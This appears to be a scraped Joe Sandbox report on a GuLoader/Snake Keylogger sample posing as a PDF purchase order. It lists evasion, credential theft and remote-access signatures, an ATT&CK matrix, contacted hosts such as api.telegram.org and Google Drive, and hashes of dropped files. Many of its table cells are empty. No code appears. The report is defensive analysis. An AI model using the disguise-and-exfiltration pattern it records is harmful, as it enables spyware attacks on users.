| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | API/Special instruction interceptor: | ||
| Source: | API/Special instruction interceptor: | ||
| Source: | RDTSC instruction interceptor: | ||
| Source: | RDTSC instruction interceptor: | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | API coverage: | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Code function: | 0_2_00405846 | |
| Source: | Code function: | 0_2_004027FB | |
| Source: | Code function: | 0_2_00406398 | |
| Source: | Code function: | 3_2_00405846 | |
| Source: | Code function: | 3_2_004027FB | |
| Source: | Code function: | 3_2_00406398 | |
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | API call chain: | graph_0-3761 | ||
| Source: | API call chain: | graph_0-3941 | ||
| Source: | Code function: | 0_2_00403C41 | |
| Source: | Code function: | 0_2_10001B18 | |
| Source: | Process token adjusted: | Jump to behavior | ||
| Source: | Memory allocated: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 0_2_00406077 | |
| Source: | Key value queried: | Jump to behavior | ||
Lowering of HIPS / PFW / Operating System Security Settings | |
|---|
| Source: | Registry value created: | Jump to behavior | ||
| Source: | Registry value created: | Jump to behavior | ||
| Source: | Registry key created or modified: | Jump to behavior | ||
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | File source: | ||
| Source: | File source: | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 215 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 55% | ReversingLabs | Win32.Trojan.Guloader |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 216.58.208.238 | true | false | high | |
| drive.usercontent.google.com | 172.217.17.65 | true | false | high | |
| reallyfreegeoip.org | 104.21.67.152 | true | false | high | |
| api.telegram.org | 149.154.167.220 | true | false | high | |
| checkip.dyndns.com | 132.226.247.73 | true | false | high | |
| checkip.dyndns.org | unknown | unknown | false | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| false | high | ||
| false | high | ||
| false | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | unknown | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
| 104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false | |
| 172.217.17.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false | |
| 216.58.208.238 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
| 132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
| Joe Sandbox version: | 41.0.0 Charoite |
| Analysis ID: | 1578319 |
| Start date and time: | 2024-12-19 15:28:06 +01:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 6m 44s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 5 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| Detection: | MAL |
| Classification: | mal100.troj.spyw.evad.winEXE@3/8@6/5 |
| EGA Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: PURCHASE ORDER TRC-090971819130-24_pdf.exe
| Time | Type | Description |
|---|---|---|
| 09:29:39 | API Interceptor |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 149.154.167.220 | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse | |||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Can Stealer | Browse | |||
| Get hash | malicious | Can Stealer | Browse | |||
| 104.21.67.152 | Get hash | malicious | GuLoader, Snake Keylogger | Browse | ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | Snake Keylogger | Browse | |||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
| Get hash | malicious | Snake Keylogger | Browse | |||
| 132.226.247.73 | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| checkip.dyndns.com | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| |
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| reallyfreegeoip.org | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| |
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| api.telegram.org | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar | Browse |
| ||
| Get hash | malicious | Can Stealer | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| TELEGRAMRU | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
| Get hash | malicious | Vidar | Browse |
| ||
| Get hash | malicious | Vidar | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| UTMEMUS | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| |
| Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | VIP Keylogger | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| |
| Get hash | malicious | MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
| Get hash | malicious | Snake Keylogger | Browse |
| ||
| 3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | Browse |
| |
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| Get hash | malicious | Abobus Obfuscator, Braodo | Browse |
| ||
| Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| 37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Unknown | Browse |
| |
| Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | GuLoader, RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
| Get hash | malicious | RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | RHADAMANTHYS | Browse |
| ||
| Get hash | malicious | RHADAMANTHYS | Browse |
|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dll | Get hash | malicious | GuLoader, MassLogger RAT | Browse | ||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\Normalfordelingernes.Tep
Download File
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 286557 |
| Entropy (8bit): | 7.770343888910271 |
| Encrypted: | false |
| SSDEEP: | 6144:9+IYOsNolNiweVFXz/H3qABowdHC6giUXb2vq1pk:YIYOsNoCz/HjnHC6gis2cu |
| MD5: | 42F88ECDCF508CA1F030AB99654B1B94 |
| SHA1: | F2D3F277A442D52BEAC7D580F54965B52B7A1DA9 |
| SHA-256: | AC87B5B811677F1A060BDF7600FD496C3FE7206E477AF66E9E87E8E31494A414 |
| SHA-512: | 2ACD83002BF2A2978E6867E0DD6E8C63B558F5B46A8F09C93DA7E324E6D4A4A11E9D9F59CDE92ABFFC7CB67CF270945C3DDDA974AAE5A62F4D91A643E8BED197 |
| Malicious: | false |
| Reputation: | low |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\Riprap43.gaw
Download File
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 56641 |
| Entropy (8bit): | 1.2318917163845036 |
| Encrypted: | false |
| SSDEEP: | 384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq |
| MD5: | 39C9A5F767D8C170B5CE38EA8D5734D4 |
| SHA1: | 4B4CA81EB3D093645B504004F62A269D4EACDECC |
| SHA-256: | 87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49 |
| SHA-512: | AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF |
| Malicious: | false |
| Reputation: | low |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\Unvenom.Lib
Download File
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 100679 |
| Entropy (8bit): | 4.621278860713537 |
| Encrypted: | false |
| SSDEEP: | 3072:WNPMSzD4yit9jfrvktCtUkSbywTZpryomlD:WNloyK9zbWO/miD |
| MD5: | 93A2D636570664ED4B7EE832BC0032E3 |
| SHA1: | 235EDA5D6FF2BBA8924B02201A19F363CE45C1AE |
| SHA-256: | 2950A96C82C080B013E477AC109CEA7823019329145AE64F81532B93C46C6480 |
| SHA-512: | EF4887A3A677B0F165E039AD891F2A4091A415ED234B6A9912EB7556B5CD1F2A2B69A5D2D783C225BC98D14BEE87AE84105B745DC62414462FE296FC047B489A |
| Malicious: | false |
| Reputation: | low |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\forskansningens.txt
Download File
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 345 |
| Entropy (8bit): | 4.241929841155785 |
| Encrypted: | false |
| SSDEEP: | 6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA |
| MD5: | AE69FE0F4D1E1115BC470031E661785C |
| SHA1: | 8D3799826FE457C61C1E8EE5E3071683A8125BC5 |
| SHA-256: | 6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE |
| SHA-512: | 969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE |
| Malicious: | false |
